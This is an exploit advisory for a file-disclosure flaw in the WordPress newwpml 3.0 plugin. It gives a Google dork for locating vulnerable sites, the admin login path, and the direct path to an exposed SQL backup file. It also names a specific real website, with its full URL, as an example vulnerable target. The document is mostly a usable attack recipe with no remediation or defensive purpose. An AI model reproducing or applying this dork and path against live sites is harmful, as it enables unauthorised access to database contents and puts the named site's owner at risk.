WordPress newwpml 3.0 Database Backup Disclosure

1. #################################################################################################
2.  
3. # Exploit Title : WordPress newwpml Plugins 3.0 Database Backup Disclosure
4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
5. # Date : 06/12/2018
6. # Vendor Homepage : wordpress.org
7. # Software Download Link : N/A
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Version Information : 3.0
11. # Exploit Risk : Low
12. # Google Dorks : inurl:''/wp-content/plugins/newwpml/''
13. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
14. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
15. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
16.  
17. #################################################################################################
18.  
19. # Admin Panel Login Path :
20.  
21. /wp-login.php
22.  
23. # Exploit :
24.  
25. /wp-content/plugins/newwpml/res/table-icl_languages_translation.sql
26.  
27. #################################################################################################
28.  
29. # Example Vulnerable Site =>
30.  
31. [+] bluebirdgroup.com/wp-content/plugins/newwpml/res/table-icl_languages_translation.sql
32.  
33. #################################################################################################
34.  
35. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
36.  
37. #################################################################################################